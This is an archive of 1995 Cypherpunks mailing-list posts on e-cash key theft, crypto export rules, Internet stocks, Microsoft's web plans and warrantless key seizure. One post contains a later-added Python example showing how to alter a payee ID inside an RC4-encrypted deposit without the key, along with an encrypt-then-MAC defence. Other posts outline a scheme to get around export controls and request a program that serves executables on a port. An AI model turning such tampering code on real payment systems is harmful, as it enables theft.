> The direct cost of a break-the-bank catastrophic failure is bounded by the 
> amount of capital the bank has.  This is because the market will not 
> accept more liabilities (real or forged) from the bank than its capital.  
> There may be other indirect costs resulting from dislocations, but these 
> should also be proportional to the size of the bank.  Therefore your 
> argument is really against centralization and for diversification and 
> distribution.

I'm sorry, when I said "unbounded" I was talking in a practical sense. 
Very few banks are willing to undertake a venture in which there is a
very-low-probability risk of a failure that is only bounded by their
total asset pool.  Technically, you are correct, that is always the
practical bound.  From a bank's perspective, however, "enough to break
the bank" is a good working definition of "unbounded risk".  They like
their risk bounded at a slightly lower threshold... :-)

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. "E.
ALLEN SMITH"@mbcl.ru (1656)

> 	The risk in question is not infinite-cost. If the person who gets
> ahold of the keys starts simply making lots and lots of money, in a free
> market the prices in digital cash for everything will start going up. This
> phenomenon will be spotted, and those taking the particular variety in
> question will stop accepting it. Losses are limited to however much was out
> there at a given time, and if there are multiple systems with free-market
> interconversion between them, that may not be very much. People will move
> out of a decaying monetary system if: A. the new system is as easy to get
> as the old; and B. the new system is as easy to spend as the old.
> 	If the person who gets the keys simply uses them on a small scale,
> then the resulting inflation and loss of value can simply be dealt with
> using the discount mechanism. It's no longer infinite risk.

Basically, the criminal in this scenario has a choice between greed and
vandalism.  If he's motivated by greed, and he's clever, he'll push
things slowly in the inflationary direction, as you describe.  If he's a
vandal or terrorist at heart, however, he might get more satisfaction
out of generating the equivalent of overnight inflation at the
billion-percent level.  That's not a decaying monetary system, it's a
suddenly-collapsing monetary system.   The only difference between those
two scenarios is the quantity of bad money the criminal chooses to print
and distribute.  (Note that this is very different from physical
counterfeiting, where the logistics of actually feeding trillions of
dollars into the money supply are quite daunting, and make the
catastrophic-vandal scenario more or less impossible.)

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Peter
Monta@qualcomm.com (892*)

> Why "the bank", rather than "all banks"?  If there is a single
> cryptographic point of failure in a widely used ecash system,
> it seems unlikely that diversity would buy you anything.  The
> worry would not be the compromised keys of a single bank, but
> rather, say, an effective cryptanalysis.  I would put this in
> the supernova class; it may be just as unlikely.

There's a big difference between breaking the algorithm and stealing the keys.

To break a cryptographic algorithm requires either a revolutionary
mathematical discovery or the discovery of a subtle coding flaw.  The
former is in the supernova category, and the latter is probably in the
"major hurricane" category.  However, stealing the keys is a relatively
simple computer crime.  You break into a computer somewhere and steal
some information.  It only breaks a single bank, but that's enough to
satisfy most criminals.....  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 15:22:37 PST
To: cypherpunks@toad.com
Subject: CPUSA = CypherPunks USA?
Message-ID: <acecb626030210046f83@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 12/7/95, E. ALLEN SMITH wrote:

>        I suspect I know what organizations they're interested in (CPUSA et
>al), but did they ask about any specific organizations?

CPUSA? You mean "CypherPunks USA"?

I agree that being on the Cypherpunks list is probably a serious threat to
one's security clearance. After all, the things we talk about are
destabilizing to governments, are conducive to creating open channels for
releasing material anyone thinks is useful to be released, and even make
espionage trivial.

(We seldom mention this, it being old hat, but the Aldrich Ames' of the
world need no longer resort to archaic tradecraft such as leaving messages
in Coke cans in the crooks of trees--digital dead drops are as close as
your nearest PGP package and remailer. This is a revolution in
espionage--not that I am advocating or condoning it, although it is often
necessary and even moral.)

Given that many of us take an explicitly trans-national approach, with
little or no loyalty to local and national governments, and given that many
of us advocate a Nietzschean kind of personal choice in deciding which laws
to obey and which to ignore, our outlook is probably as dangerous to secret
programs as membership in the Communist Party would be (especially these
days, where membership in the CP would be seen as either a sign of slow
thinking or quaintness).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Kuchling <andrewk@dexotek.ca>
Date: Thu, 7 Dec 95 13:58:51 PST
To: cypherpunks@toad.com
Subject: Python Cryptography Toolkit v1.0.0
Message-ID: <9512072158.AA15573@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just uploaded version 1.0.0 of the Python Cryptography Toolkit, a
collection of cryptographic routines for the Python programming language.
It's at ftp://ftp.cwi.nl/pub/pct/pycrypt100.tgz.  All my code is public
domain; some of the algorithm implementations are GPLed.

	The Toolkit now contains various cryptographic algorithms such
as DES, IDEA, MD5, etc.  I will fix bugs in the software, and may add
or remove the odd module if some startling new research result comes
out, but things should be pretty stable from now on.

	The algorithms available are:

Hash functions: Haval, MD2, MD4, MD5, SHA.
Private-key encryption: 
	Blowfish, DES, DES3 (Triple DES), Diamond, IDEA, Alleged RC4, 
	32-bit RC5, REDOC III. 

Public-key: Digital Signature Standard, ElGamal, RSA.  (There's a
	non-functional ESIGN module included, too; I'll finish it
	for a subsequent release.)

	Python is an interpreted scripting language; see
http://www.python.org for more information, the source code, and
binaries.  It includes arbitrary-sized integers, so the public-key
algorithms are implemented in pure Python; this entails a speed
penalty, but makes the code more valuable for educational purposes.

	A sample usage of a hash algorithm (MD5) is:
>>> import md5
>>> hash=md5.new()
>>> hash.update(message)
>>> hash.digest()
'\235\361\034\357\217MX\2246\226\367\366Ebx\326'

	A sample use of an encryption algorithm (IDEA, in this case) is:
>>> import idea
>>> obj=idea.new('This is a key456', idea.ECB)
>>> message="The answer is no"
>>> ciphertext=obj.encrypt(message)
>>> ciphertext
'\2325$\343=)d\341^\025<\344\013\204 T'
>>> obj.decrypt(ciphertext)
'The answer is no'

	Questions, comments, or suggestions are welcomed at the
address below.


	Andrew Kuchling 
	andrewk@cst.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 7 Dec 95 14:12:45 PST
To: cypherpunks@toad.com
Subject: revised librand now on ftp.research.att.com site
Message-ID: <199512072219.RAA04588@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the noise, but I just discovered that the librand.shar file
that I put in my ftp directory got garbled somewhere along the line.
I've repaired the damage and put a correct version of the file in:
    ftp://ftp.research.att.com/dist/mab/librand.shar
(Worst of all, the garbled version actually compiled, but you can
tell you have it by its failure to link properly).

Again sorry for the noise.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 16:01:24 PST
To: cypherpunks@toad.com
Subject: Internet Stocks
Message-ID: <acecb88804021004fee3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 12/7/95, Adam philipp wrote:
>16% tumble today...
>
>   ...is the word getting out?
>

A few of you have corresponded with me about investments, Internet stocks,
etc., so I reckon there's enough interest out there to share a few thoughts
with you. Those who think this list has only to do with number theory or
PGP are of course welcome to skip this message now and get back to reading
Koblitz.

I won't say anything negative or positive about Netscape per se, but here
are some various developments:

* A Smith Barney analyst today made essentially the same sort of comments
that I (and maybe another or two) made several days ago, namely, that the
market capitalizations are incredible ($7 B for Netscape at $170/share),
that browsers are not a proprietary "franchise" (in that the standard is an
open one), that a lot of competition is coming (Spyglass Mosaic, Oracle,
Microsoft, etc.), and that many people hysterically bidding up the price of
Internet stocks are barely aware of what this "Internet thing" is. He
issued a "sell" recommendation on Netscape, an "underperform"
recommendation on Netcom, Spyglass, UUNet, etc., and was generally bearish
on the sector. (I saw him interviewed on CNBC, minutes before Marc
Andreessen was interviewed.)

* From a high on Tuesday of $170, Netscape was down to $130 at one point
today. I haven't seen the closing price.

* Analysts are also closely looking at the February '96 end of the
"lockout" in some stock sales by Netscape employees. Basically, a lot of
the shares that went to employees, etc., cannot be sold for 180 days after
the IPO, which was in early August of this year. The effects of shares
being put on the market is not clear, of course, and it is possible the
effects will be minimal. Still, it might be prudent to take this into account
when considering strategies.

* Microsoft also made announcements indicating a move closer to a standard
Web browser strategy (as opposed to trying to sell the world on Microsoft
Network).  deal with Spyglass, and a licensing of JavaScript. (There've
been too many deals connected with browsers, Java, etc. for me to even begin
to summarize here.)

* Sentiment moves in waves, as per the Dutch tulip bulb scenario, and what
was headed for the moon a few days ago is suddenly a turkey, to many. The
whipsawing in Netscape, UUNET, Netcom, etc., is incredible: up 30 points in
two days, then down 30 points in two days!

By the way, some have sent me mail asking about how to sell these and other
stocks short. One can sell them short directly (getting the money now and
agreeing to deliver the shares at a later date), but this is risky, should
these stocks rise. (And some of these shares are not readily available for
short sales, due to the limited number of shares on the market and the
difficulty of finding someone to lend the shares for a short sale.) One's
risk is essentially unbounded (but practically there are some reasonable
limits to how much the stock can rise, of course). Short sellers are always
advised to remember this maxim:

"He who sells what isn' his'n, must buy it back or go to prison."

(It is said that some of the rise in Netscape stock price is due to "the
shorts running for cover." That is, those who shorted the stock at, say,
$80 are frantically trying to buy the stock to close out their positions.
This can cause the relatively few shares to be bid further and further up.
As I keep saying, be careful in believing this or not.)

A safer strategy is to buy puts and calls, or to sell puts and calls.
Buying "puts" (my mnemonic: the right to "put it" to another investor)
involves, say, buying the right to sell a stock at some price in the
future. Thus, one might buy a put on the Internet Index
(http://www.amex.com), a collection of Internet-related stocks, to sell the
IIX at $25 in April, '96 for a strike price of $255. If the IIX goes _up_,
and as April approaches, that put will become worth less and less and may
become worthless. If the IIX goes _down_, that put becomes more worthwhile
(because one has the right to "put" it to someone for $255 when the actual
value of the IIX has dropped to, say, $200). (Roughly speaking, at
expiration in April '96 this put will be worth $55, for a doubling of one's
original investment; the pricing of options depends on a lot of things,
including risk, time value of money, expectations, etc.)

At this point there are no widely-available puts and calls on most of the
recent high-fliers on the Internet. This is why the IIX looks to be a way
to play this game.

Interested investors should also look at LEAPs, which are essentially puts
and calls with much longer expiration dates. A friend of mine bought $25K
worth of Intel LEAPs (JAN96s) during the height of the Pentium debacle,
when Intel was trading at $30, and in the next six months this $25K
investment became worth over $300K.

(Needless to say, your mileage may vary. Don't blame me if you lose your
shirt. Bulls make money, bears make money, but pigs never make money, as
another maxim goes.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Thu, 7 Dec 95 08:30:16 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <9512062236.AA01307@alpha>
Message-ID: <Pine.NXT.3.91.951207171726.21974V-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain



I don't know the US-Export regulations very well, so please
allow a quick one:

Maybe a legal way around the keysize-regulation would be:

Many US companies have subsidiaries <sp?> outside the US.
Some of them are led by non-US-citizens.

1) The U.S.-company engineers a software with strong (but legal) 
   crypto for use inside the U.S. The program is sold in the U.S.
   At the same time the company exports the sourcecode of the
   program *without* any crypto at all to their subsidiaries.
   (should be legal)
2) one or more of the subsidiaries include "self-engineered"
   crypto-routines into the program-"hull" they received 
   from inside the U.S.
   This program is sold in the subsidiaries' countries (Europe etc.) 

Two things have to be assured:

- Both crypto-routines have to be compatible
- No U.S.-citizens must be involved in the engineering of the 
  subsidiaries' crypto-routines.


Any comments?

	ohuf.
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Thu, 7 Dec 95 14:43:44 PST
To: "'cypherpunks@toad.com>
Subject: Micro$oft and Java
Message-ID: <01BAC4CB.B3611840@loki>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft announced its Internet plans, and is considering licensing Java 
from Sun Microsystems. Other parts of the plan: OLE controls that can be 
transmitted over the Web, acting like applets; Web-related enhancements to 
Visual Basic; commerce, security, publishing and server software. [WSJ 12/7 
p.B8]

IBM joined the ranks of companies licensing Java software from Sun 
Microsystems. The company plans to integrate the technology into all its 
Internet software and operating systems, including the version of Windows 
3.1 it sells. [NYT 12/7 p.D2] [WSJ 12/7 p.B8] 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 7 Dec 95 18:04:10 PST
To: cypherpunks@toad.com
Subject: Re: Micro$oft and Java
Message-ID: <199512080205.SAA02898@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I was at the Microsoft presentation.  Crypto-relevant info:

A patch will be published in the next few days to address the weak .PWL
encryption.  I got a rather lame excuse about how the encryption was first
implemented in 1991, and how it was sufficient then.  They will supposedly
be changing the seed.

I asked about what MS was doing in regard to future strong crypto.  Got an
interesting response in that "the government was going to let them
implement 768 bit keys."  I later asked an MS person if these were RSA
session keys or what.  He said yes, but I really don't think he knew what he
was talking about based on some of his other comments.

Visual Basic Script will be MS's response to JavaScript.  The interesting
thing here is a plan to use digital signatures on controls and scripts as a
means of authentication.  The comment was made "you'd trust something signed
by Lotus or some other big name, but you probably wouldn't be that trustful
of a piece of shareware."  Hmmm...

MS will be releasing a "safe" runtime version of Visual Basic that will
supposedly prevent nasty virii and trojan horses from being implemented on
Web pages.  IMHO, Perry's previous comments on the security of Java apply.

Servers and some clients will support end-to-end encryption.  No details...

I didn't ask about GAK.  Bill said there was a white paper explaining
Microsoft's position on encryption.  Maybe I'll test the search capabilities
of the MS Web site later tonight.

Overall, the presentation was interesting (but obviously lacking in
technical details as the audience was mostly press).  MS is going to throw a
lot of resources at this in order to maintain its industry dominance.

Thought for the day.  Bill on the relevance of the briefing being held on
Pearl Harbor day quoted Admiral Yamamoto after the 1941 attack, "we have
awoken a sleeping giant."  Draw your own conclusions on that one...

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Thu, 7 Dec 95 02:06:11 PST
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: FW: websurfer 4.6 (fwd)
In-Reply-To: <Pine.SUN.3.91.951202115438.2073D-100000@viper.law.miami.edu>
Message-ID: <Pine.LNX.3.91.951207174345.8504B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Michael Froomkin wrote:

> so much for compatibility....guess I'm sticking with netscape for now.

These guys at Netmanage's support seem to confuse Trumpet's version number
with the Winsock version... Trumpet 2.0b (as, AFAIK, any other Winsock
package presently available) is Winsock 1.1 compliant. 

By the way, I read in the "about/more" screen of Websurfer 4.6 (that 
works with my Win95 TCP/IP stack):

-------- 8< -------------------
Cryptography developed and
provided by Cylink Corporation
http://www.cylink.com
Portions copyrighted 1995
-------- 8< -------------------

and on the right side of the URL field a little (open) lock icon is shown. 
However, I haven't found anywhere references to secure connections. Does 
anybody know more about it? For sure, "https:" URLs are not recognized.

Enzo

______________________________________________________________________

> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's warm here.
> 
> ---------- Forwarded message ----------
> Date: Fri, 1 Dec 95 16:49:34 PST
> >From: Netmanage Technical Support <Support@netmanage.com>
> To: Michael Froomkin <froomkin@law.miami.edu>
> Subject: FW: websurfer 4.6 
> 
> 
> Hello,
> 
> Thank you for emailing NetManage Technical Support. WebSurfer 4.6 was
> designed to work on Winsock 1.1 compliant systems. Since you are
> running Winsock version 2.0 this may be the reason for the
> application not working. We will report this to Engineering so
> hopefully in a future release WebSurfer might be able to support
> this new Winsock version.
> 
> Thank you for considering Chameleon WebSurfer,
> 
> Support@netmange.com
> ==
> [earlier, I had said:]
> 
> won't start on my pentium 100 w/ 20Mb running qemm 7.04, windows 3.11, 
> winsock 2.0 rev B on a novell 3.x LAN.
> 
> Netscape runs fine.
> 
> This might help:
> Trumpet Winsock Version 2.0 Revision B
> Copyright (c) 1993,1994 by Peter R. Tattam
> All Rights Reserved.
> THIS IS AN UNREGISTERED SHAREWARE VERSION FOR EVALUATION ONLY.
> Ethernet address = 00:00:F4:D2:64:D3
> WINPKT packet driver located on vector $66
> IP buffers = 32
> Performing bootp...Bootp successful
> My IP = 129.171.188.92 netmask = 255.255.255.0 gateway = 129.171.188.1
> Task WEBSURF(22E7) did not call WSACleanup.
> Task WEBSURF(38EF) did not call WSACleanup.
> 
> 
> -----------------End of Original Message-----------------
> 
> If responding to a previous message please include the original for our reference. To ensure a faster  reply be sure to reply to 'support@netmanage.com' and not to individual sender of 
> messages.
> 
> --         /\ 
> **********/@@\ *********************************
>           \__/      NetManage Inc.
>        W   AA   W   Home of Chameleon TCPIP for Windows
>        |__AYA__/    TCPIP Apps for Windows and NT
>          AXXV          
>          VXXV          
>       W  VUV   W      Technical Support  (408)973-8181
>       |_/ V \_/ __        Fax (408)973-8272 
>            \   [_ \             
>             \_____/    MIME enclosures are OK 
>                               gopher server: gopher.netmanage.com
> 	             www:   http:/www.netmanage.com
>                    
> For a list of current NetManage products use WebSurfer and go to:     http://www.netmanage.com:80/netmanage/products/upgrade.html
> 
> Serendipity
> 11/20/95
> 10:36:42 AM
> 
> This message was sent by Chameleon 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 7 Dec 95 18:31:50 PST
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951207202351.6540B-100000@polaris.mindport.net>
Message-ID: <199512080227.SAA15534@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > You mean if you give me your key the police can get it from me without a
> > warrant? What if I don't want to give it up, and you don't? How would the
> > police get it without a warrant?
> 
> Yes.  Unless it could be shown that there was an expectation of privacy 
> in the transfer, or that there was an understanding that you intended this 
> to be a confidential matter.  Or in the alternative, that the 

	I do not understand.

Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
Bob "I want Alice's key, you need to give it to me. I don't have a
warrant."

How is this different from
Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
you need to give it to me. I don't have a warrant."


	sheesh, what a fucked up legal system.
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 7 Dec 95 18:48:39 PST
To: cypherpunks@toad.com
Subject: Anyone Remember socket.c?
Message-ID: <199512080248.SAA29014@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fellow 'Punks,

A while back on the list, someone posted a very short C
program called socket.c, which, when given a port number
and an executable, would fork off copies of a given
application for anyone who connected to the port. 

I saved the program at the time, but seem to have
deleted it.  I realize it would be trivial to write, 
but don't want to have to look at nasty network 
#include files. 

If someone could either post it to the list again, or
email me a copy, I will be eternally grateful. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Dec 95 15:47:33 PST
To: cme@acm.org
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <9512072127.AA28756@tis.com>
Message-ID: <Pine.SUN.3.91.951207184258.1146D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995 cme@acm.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST)
> >From: Black Unicorn <unicorn@polaris.mindport.net>
> >Subject: Re: Netscape gives in to key escrow
> 
> >An individual has no legitimate expectation of privacy in the encryption 
> >numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
> >those numbers to the government when he purchased the software.
> 
> It could be even worse.  I was on a panel last year with Scott Charney (sp?)
> (I believe from DoJ) during which he commented that if you give your secret
> key to anyone -- e.g., your own company -- then you have given up the
> presumption of privacy.  That leaves the police open to get that secret
> without a warrant.

Uh, you managed to delete the part of my message that said precisely this 
- i.e. that conveying information to a third party with which you have 
no expectation of confidentiality estops you from later claiming said 
information as a protected interest under the fourth amendment.

You also deleted the citation to the case.  They aren't my words, they 
are those of the supreme court.  (The GAK bit was my extrapolation of the 
concept into the realm of key forfeiture)

> This claim should be checked by a real lawyer.

I am a real lawyer.

> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
> |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
> |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
> +---------------------------------------------- Jean Ellison (aka Mother) -+
> -----BEGIN PGP SIGNATURE-----
[...]
> -----END PGP SIGNATURE-----

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 7 Dec 95 18:46:52 PST
To: Alice <na455120@anon.penet.fi>
Subject: Re: [FYI] FBI Training Eastern European Police
Message-ID: <v03003f0bacec4fbd23a7@[129.46.82.94]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:22 PM 12/6/95, anonymous-remailer@shell.portal.com wrote:
[elided]
>I'm certain that the FBI and other law-enforcement officials might
>also learn by living in a city where the East truly meets the West.
>
>Budapest is a beautiful old city of bridges, not just literally but
>figuratively.  It's where anyone in the world can find comfort.
[much elided]

Hey "Alice,"

This is a very perspicacious set of observations about Budapest, a city I
lived/worked in for a while (you sound like you know it rather well
yourself). The level of technical CS knowledge in Bp is comparable to, or
better than, many other cities (except maybe for Moscow and St. Petersburg)
in the former Bloc. Your comments also provide good insights into why it's
technically and geographically important to cypherpunks: it's the petri
disk for many of our cpunk brethren over there.

The fact that the FBI has chosen Bp as one of their entry-points into the
region impacts our policy discussions here, particularly since our LE types
are making contact with the former secret police in that region, and
especially so given the stationing of US Troops in Kaposvar as we type
(southern Hungary) for easy entry into Bosnia. Anyone who attended CFP 95
may also remember some of Esther Dyson's lunchtime comments about the
Russian mafia (which has a strong presence in Bp) and the growth of
crypto's use both by the gangsters and LE officers. Some of the most
powerful crypto may be emanating from these regions and it would be wise
for us to try and track TLA activities in that area.

I won't drag this topic out any further, but if anyone comes across similar
info about our various TLAs' operations over there, I hope they'll at least
share it with me, if not the list.

   dave

PS: I hope Perry's paying attention. ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 7 Dec 95 08:51:19 PST
To: cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <199512071601.IAA23556@blob.best.net>
Message-ID: <Pine.SOL.3.91.951207183747.7445B-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, James A. Donald wrote:

> At 10:06 AM 12/7/95 -0500, Duncan Frissell wrote:
> > Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
> > accounts? 
> 
> I would wait for some more solvent foreign country to get into digicash.

What about Estonia :) The taxes are low, there are a very few government 
regulations, the currency is very stable (based on German mark) ... One 
interesting law in Estonia is that the state budget must be balanced, so 
there is no way for the government to spend more money than it really has.

Technological level here is also quite good, and Internet is more popular
than in any other Eastern Europe or ex-USSR country. 

I think Estonia is an ideal place for such projects: high-tech companies 
testing their new technological ideas, inventions and business 
assumptions in real-life conditions. Just get yourself here !

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 7 Dec 95 10:55:04 PST
To: Mark Twain Ecash Support <support@marktwain.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <Pine.3.89.9512071804.A21520-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Mark Twain Ecash Support wrote:

> >Anyhow, the obvious solution is encryption.  Our new observation is
> >that encrypting deposits & cancellations with the mint's public key
> >is not enough to solve the problem.
> [Argument in support of claim elided... I am not convinced.]

I think he means you shouldn't use a stream cipher like RC4 that XORs the
plaintext with the generated keystream, since if you know part of the
plaintext, you can XOR those bytes with (the id you want) XOR (the id
being sent) and change the encrypted data so that the payment goes into
your account and not theirs. This is a tough, but potentially feasible
attack if you use that kind of encryption scheme. 

Is there anywhere that you could use a similar attack on SSL ?

	Mark
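
[Added example, not part of the original post and not DigiCash code.] The
malleability Mark describes, shown next to the usual fix: a MAC over the
ciphertext, checked before decrypting. The deposit format, the field offset,
the nonce-based key derivation and all function names are assumptions made up
for the illustration.

```python
import hashlib
import hmac
import os


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream (key schedule, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stream_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR with a keystream from a per-message key.

    Deriving the per-message key with HMAC(key, nonce) is an assumption of
    this example; it only avoids reusing one keystream for two messages.
    """
    msg_key = hmac.new(key, nonce, hashlib.sha256).digest()
    return xor_bytes(data, rc4_keystream(msg_key, len(data)))


def flip_field(ciphertext: bytes, offset: int, sent: bytes, wanted: bytes) -> bytes:
    """XOR (sent XOR wanted) into the ciphertext at a known offset.

    No key is involved: this is the modification described in the message.
    """
    if len(sent) != len(wanted) or offset + len(sent) > len(ciphertext):
        raise ValueError("field does not fit")
    patched = bytearray(ciphertext)
    for k, delta in enumerate(xor_bytes(sent, wanted)):
        patched[offset + k] ^= delta
    return bytes(patched)


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: nonce || ciphertext || HMAC-SHA256(nonce || ciphertext)."""
    nonce = os.urandom(16)
    ct = stream_crypt(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_sealed(enc_key: bytes, mac_key: bytes, blob: bytes) -> bytes:
    """Verify the tag in constant time, and decrypt only if it matches."""
    if len(blob) < 16 + 32:
        raise ValueError("truncated message")
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: message was modified")
    return stream_crypt(enc_key, nonce, ct)


# Constructed sample message; the real protocol's layout is not on this page.
DEPOSIT = b"DEPOSIT payee=00041872 amount=00002500"
SENT_ID, WANTED_ID = b"00041872", b"00099999"
FIELD_OFFSET = DEPOSIT.index(SENT_ID)


def demo():
    enc_key, mac_key = os.urandom(16), os.urandom(32)

    # 1. Stream cipher alone: the altered ciphertext decrypts without error.
    nonce = os.urandom(16)
    ct = stream_crypt(enc_key, nonce, DEPOSIT)
    altered = flip_field(ct, FIELD_OFFSET, SENT_ID, WANTED_ID)
    accepted_plaintext = stream_crypt(enc_key, nonce, altered)

    # 2. Encrypt-then-MAC: the same change is caught before decryption.
    blob = seal(enc_key, mac_key, DEPOSIT)
    bad = blob[:16] + flip_field(blob[16:-32], FIELD_OFFSET, SENT_ID, WANTED_ID) + blob[-32:]
    try:
        open_sealed(enc_key, mac_key, bad)
        rejected = False
    except ValueError:
        rejected = True

    return accepted_plaintext, rejected, open_sealed(enc_key, mac_key, blob)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Encrypting to the mint's public key hides the contents but does not by itself
provide this integrity check; the receiver has to verify a MAC or signature
over the ciphertext.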





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 7 Dec 95 18:43:12 PST
To: cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on El
In-Reply-To: <kklpxbOMc50e1DgT9u@nsb.fv.com>
Message-ID: <H7kRFD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. "E.
> ALLEN SMITH"@mbcl.ru (1656)
>
